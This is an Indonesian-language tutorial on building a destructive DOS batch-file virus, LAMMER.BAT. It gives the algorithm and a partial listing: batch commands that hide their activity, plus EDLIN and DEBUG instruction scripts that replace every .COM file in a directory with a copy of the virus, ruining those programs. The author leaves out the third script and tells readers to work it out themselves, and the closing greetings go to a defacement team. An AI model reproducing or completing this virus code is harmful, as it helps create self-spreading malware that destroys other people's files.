Professional Documents
Culture Documents
Com
Copyright © Jasakom.Com. All rights reserved.
Virus adalah penyakit yang tidak bisa di berantas secara tuntas sejak dahulu. Kini
kita akan melihat teknik bagaimana virus tersebut bisa dibuat.
Perhatian !
Program dibawah ini dapat menulari sistem, tetapi dengan cara yang cepat dapat
diketahui.Berikut ini adalah saran – saran yang harus selalu di perhatikan pada waktu
bereksperimen dengan virus:
Sebagai awal dalam mempelajari pemrograman virus komputer , berikut ini akan
ditampilkan virus komputer dalam bentuk batchfile.Virus ini memanfaatkan fasilitas dari
DOS, dengan memanggil instruksi – instruksi file internal dan eksternal. Instruksi –
instruksi file internal (instruksi yang merupakan “bagian dalam†dari modul sistem
operasi tempat modul tersebut dipindahkan ke memori-internal/RAM pada saat boot)
digunakan sesuai dengan hukum-instruksi dalam batchfile.Untuk instruksi – instruksi
file eksternal seperti DEBUG dan EDLIN, harus disediakan file-file yang
diperlukan.Disamping itu virus ini juga memanfaatkan pemilihan arah bagi operasi
masukan dan keluaran dalam PC-DOS(I/O redirection).Virus in hanya menyerang file
– file yang berekstensi COM.
Seperti yang telah kita ketahui bersama bahwa sebuah virus mempunyai 5 buah
kemampuan, yaitu :kemampuan mendapatkan informasi, kemampuan memeriksa
program, kemampuan menggandakan diri dan menularkan, kemampuan
menyembunyikan diri. Dari kelima buah kemampuan tersebut hanya 2 kemampuan yang
dimiliki oleh virus batchfile yang akan saya bahas disini, yaitu kemampuan mendapatkan
informasi serta kemampuan menggandakan diri dan menulari file yang lain. Meskipun
demikian, virus ini sudah dapat bekerja karena kedua kemampuan tersebut merupakan
inti dari sebuah virus komputer, sedangkan kemapuan yang lain hanyalah tambahan.
Bila ditinjau dari jenisnya, maka virus bacthfile ini adalah virus yang bersifat
menumpangi program yang ditularinya. Dengan demikian suatu program yang telah
tertular virus ini menjadi tidak dapat dipakai lagi, karena telah dirusak oleh virus.
2. ALGORITMA
Dengan demikian sesudah penularan, isi dari file yang ditulari adalah persis sama
dengan file LAMMER.BAT.Sehingga pemanggilan terhadap file yang tertular
mempunyai akibat sama dengan memanggil file LAMMER.BAT.
3. BAGAN ALIR
4. Listing Program
Echo off --> (Keluaran ke layar dihadang, sehingga pekerjaan yang dilakukan oleh
batchfile tidak tampak oleh pemakai)
Ctty nul ----> (Masukan dan keluaran diubah arahnya ke NUL -device)
Dir *.com/w.daftar ---> (Nama dari semua file dengan ekstensi .Com dalam directory
yang aktif ditulis dalam file DAFTAR.pilihan “/w†akan membuat tanggal dan
panjangn file tidak ditampilkan)
Edlin daftar<\1 ---> (EDLIN mendapat masukan dari perintah-perintah dalam file
instruksi “1†untuk menyunting file DAFTAR)
Ctty con ---->(Masukan dan Keluaran kembali ke keyboard dan layar, tetapi layar tetap
kosong (echo off)
3. buah file instruksi dengan nama “1†, “2†dan “3†(tanpa ekstensi)
berhubungan dengan file batchfile :LAMMER.BAT diatas,sbb:
NAMA FILE : 1
1,4d
e
NAMA FILE : 2
M100,10b,f000
E108 “.batâ€
M100,10b,f010
E100†DELâ€
Mf000,f00b,104
E10c 2e
E110 0d,0a
Mf010,f020,11f
E112 “COPY \LAMMER.BATâ€
E12b 0d,0a
Rcx
2c
nperintah.bat
w
q
NAMA FILE 3:
Maaf file instruksi ketiga tidak dapat ditulis di bagian ini karena mengandung dua
kali Ctrl-Z (hex 1Ah) dan Saya sendiri udah capek nulisnya hehehehe .maklum blom
minum jamu kuat hehehe hehe
Gunakan kreatifitas anda sebagai programmer
Author : Dr`Ponidi
Dedication : For Knowledgement & Open Source
Greetz : #DEFACE-TEAM@IRC.DAL.NET
#DHEGLENG@IRC.DAL.NET